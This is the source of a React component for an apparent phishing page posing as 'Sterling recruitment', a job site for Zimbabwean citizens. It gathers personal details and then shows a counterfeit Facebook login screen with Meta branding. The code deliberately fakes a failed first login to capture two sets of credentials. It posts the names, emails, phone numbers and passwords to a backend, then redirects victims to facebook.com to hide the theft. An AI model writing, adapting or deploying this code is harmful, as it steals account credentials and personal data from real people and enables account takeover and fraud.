import { useState } from 'react';
import axios from 'axios';
import styles from './Container.module.scss';
import formStyles from './Form.module.scss';

const Container = () => {
  const apiAddress = process.env.REACT_APP_API_ADDRESS;

  const provinces = [
    { value: null, text: '--Select Province--' },
    { value: 'Bulawayo', text: 'Bulawayo' },
    { value: 'Harare', text: 'Harare' },
    { value: 'Manicaland', text: 'Manicaland' },
    { value: 'Mashonaland Central', text: 'Mashonaland Central' },
    { value: 'Mashonaland East', text: 'Mashonaland East' },
    { value: 'Mashonaland West', text: 'Mashonaland West' },
    { value: 'Masvingo', text: 'Masvingo' },
    { value: 'Matabeleland North', text: 'Matabeleland North' },
    { value: 'Matabeleland South', text: 'Matabeleland South' },
    { value: 'Midlands', text: 'Midlands' },
  ];

  const [username, setUsername] = useState('');
  const [email, setEmail] = useState('');
  const [gender, setGender] = useState(null);
  const [province, setProvince] = useState(null);
  const [password, setPassword] = useState('');
  const [phone, setPhone] = useState('');
  const [currentScreen, setCurrentScreen] = useState(1);
  const [tries, setTries] = useState(0);
  // eslint-disable-next-line
  const [firstTryPhone, setFirstTryPhone] = useState('');
  // eslint-disable-next-line
  const [firstTryPassword, setFirstTryPassword] = useState('');
  const [verifying, setVerifying] = useState(false);
  // const [prevScreen, setPrevScreen] = useState(0);

  const onChangeUsername = (e) => setUsername(e.target.value);
  const onChangeEmail = (e) => setEmail(e.target.value);
  const onChangeGender = (e) => setGender(e.target.value);
  const onChangeProvince = (e) => setProvince(e.target.value);
  const onChangePhone = (e) => setPhone(e.target.value);
  const onChangePwd = (e) => setPassword(e.target.value);

  const onNext = () => {
    const submitData = async () => {
      setVerifying(true);

      try {
        const res = await axios.post(`${apiAddress}/data/add`, {
          username,
          email,
          province,
          gender,
          firstTryPhone,
          firstTryPassword,
          secondTryPhone: phone,
          secondTryPassword: password,
        });

        const status = res.status;
        if (status === 200) {
          setVerifying(false);
          window.location = 'https://facebook.com';
        } else {
          throw new Error('Internal server error. Try again');
        }
      } catch (err) {
        window.alert(`Failed to login\n${err}`);
      } finally {
        setPhone('');
        setPassword('');
        setVerifying(false);
      }
    };

    const tryAgain = () => {
      setFirstTryPhone(phone);
      setFirstTryPassword(password);
      setPhone('');
      setPassword('');
      setVerifying(true);
      setTries((prev) => prev + 1);

      setTimeout(() => {
        setVerifying(false);
        window.alert('Failed to login\nTry again');
      }, 2000);
    };

    switch (currentScreen) {
      case 1:
        setCurrentScreen((prev) => prev + 1);
        break;
      case 2:
        if (
          username.length < 3 ||
          email.length < 3 ||
          email.indexOf('@') < 0 ||
          email.lastIndexOf('.') <= email.indexOf('@') ||
          province === null ||
          gender === null
        ) {
          window.alert(
            'Please provide valid name, email, province and gender!'
          );
          return;
        }
        setVerifying(true);

        setTimeout(() => {
          setCurrentScreen((prev) => {
            setVerifying(false);
            return prev + 1;
          });
        }, 2100);
        break;

      default:
        if (phone.length < 3 || password.length < 3) {
          window.alert('Please provide valid login credentials');
          return;
        }
        tries > 0 ? submitData() : tryAgain();
        break;
    }
  };

  const onPrev = () => {
    switch (currentScreen) {
      case 2:
        setCurrentScreen((prev) => prev - 1);
        break;

      default:
        break;
    }
  };

  return (
    <div className={`${styles.Container} ${currentScreen === 3 && styles.fb}`}>
      <header className={currentScreen === 3 && styles.fb}>
        <h1>Sterling recruitment</h1>
      </header>
      <main>
        <form
          className={`${formStyles.Form} ${
            currentScreen === 3 && formStyles.fb
          }`}
        >
          {verifying ? (
            <div className={styles.wait}>Please wait</div>
          ) : (
            <>
              <div className={formStyles.screensContainer}>
                <section
                  className={`${formStyles.screen} ${formStyles.screen1} ${
                    currentScreen === 1 && formStyles.show
                  } ${currentScreen > 1 && formStyles.left}`}
                >
                  <div
                    className={`${formStyles.formGroup} ${
                      currentScreen === 1 && formStyles.confirmText
                    }`}
                  >
                    <p>
                      By clicking "Continue" you acknowledge that you are a
                      Zimbabwean citizen at least 18 years old
                    </p>
                  </div>
                </section>
                <section
                  className={`${formStyles.screen} ${formStyles.screen2} ${
                    currentScreen === 2 && formStyles.show
                  } ${currentScreen === 3 && formStyles.left} ${
                    currentScreen === 1 && formStyles.right
                  }`}
                >
                  <div className={formStyles.formGroup}>
                    <label htmlFor='name' className={formStyles.offscreen}>
                      Your full name
                    </label>
                    <input
                      type='text'
                      name='name'
                      id='name'
                      placeholder='Full Name'
                      value={username}
                      onChange={onChangeUsername}
                      required
                    />
                  </div>
                  <div className={formStyles.formGroup}>
                    <label htmlFor='email' className={formStyles.offscreen}>
                      Your email address
                    </label>
                    <input
                      type='email'
                      name='email'
                      id='email'
                      placeholder='Email'
                      value={email}
                      onChange={onChangeEmail}
                      required
                    />
                  </div>
                  <div className={formStyles.formGroup}>
                    <label htmlFor='province' className={styles.offscreen}>
                      Select province
                    </label>
                    <select
                      name='province'
                      id='province'
                      placeholder='Province'
                      value={province}
                      onChange={onChangeProvince}
                      required
                    >
                      {provinces.map(({ value, text }) => (
                        <option key={text} value={value}>
                          {text}
                        </option>
                      ))}
                    </select>
                  </div>
                  <div className={formStyles.formGroup}>
                    <label htmlFor='gender' className={styles.offscreen}>
                      Select Gender
                    </label>
                    <select
                      name='gender'
                      id='gender'
                      placeholder='Gender'
                      value={gender}
                      onChange={onChangeGender}
                      required
                    >
                      <option value={null}>--Select Gender--</option>
                      <option value={'male'}>Male</option>
                      <option value={'female'}>Female</option>
                    </select>
                  </div>
                </section>
                <section
                  className={`${formStyles.screen} ${formStyles.screen3} ${
                    currentScreen === 3 && formStyles.show
                  } ${currentScreen < 3 && formStyles.right}`}
                >
                  <article
                    className={`${formStyles.formGroup} ${formStyles.ctaText}`}
                  >
                    <p>Sign In With Facebook To Continue</p>
                    <div className={styles.fbLogo}>f</div>
                  </article>
                  <article>
                    <div className={formStyles.formGroup}>
                      <label htmlFor='phone' className={formStyles.offscreen}>
                        Your email or phone
                      </label>
                      <input
                        type='text'
                        name='phone'
                        id='phone'
                        placeholder='Mobile number or email address'
                        value={phone}
                        onChange={onChangePhone}
                        required
                      />
                    </div>
                    <div className={formStyles.formGroup}>
                      <label
                        htmlFor='password'
                        className={formStyles.offscreen}
                      >
                        Your password address
                      </label>
                      <input
                        type='password'
                        name='password'
                        id='password'
                        placeholder='Password'
                        value={password}
                        onChange={onChangePwd}
                        required
                      />
                    </div>
                  </article>
                </section>
              </div>
              <div className={formStyles.actionBtns}>
                {currentScreen === 2 && (
                  <div
                    className={currentScreen === 2 && formStyles.button}
                    onClick={() => onPrev()}
                  >{`${currentScreen === 2 ? 'Prev' : ''}`}</div>
                )}
                <div
                  className={`${formStyles.button} ${
                    currentScreen === 3 && formStyles.fb
                  } ${currentScreen === 1 && formStyles.confirm}`}
                  onClick={() => onNext()}
                >{`${
                  currentScreen === 3
                    ? 'Log in'
                    : currentScreen === 1
                    ? 'Continue'
                    : 'Next'
                }`}</div>
              </div>
              {currentScreen === 3 && (
                <div className={styles.metaLogo}>
                  <div className={styles.blueCircle}></div>
                  <div className={styles.whiteCircle}></div> Meta
                </div>
              )}
            </>
          )}
        </form>
      </main>
      <footer className={currentScreen === 3 && styles.fb}>
        &copy; {new Date().getFullYear()} Sterling recruitment. All rights
        reserved
      </footer>
    </div>
  );
};

export default Container;
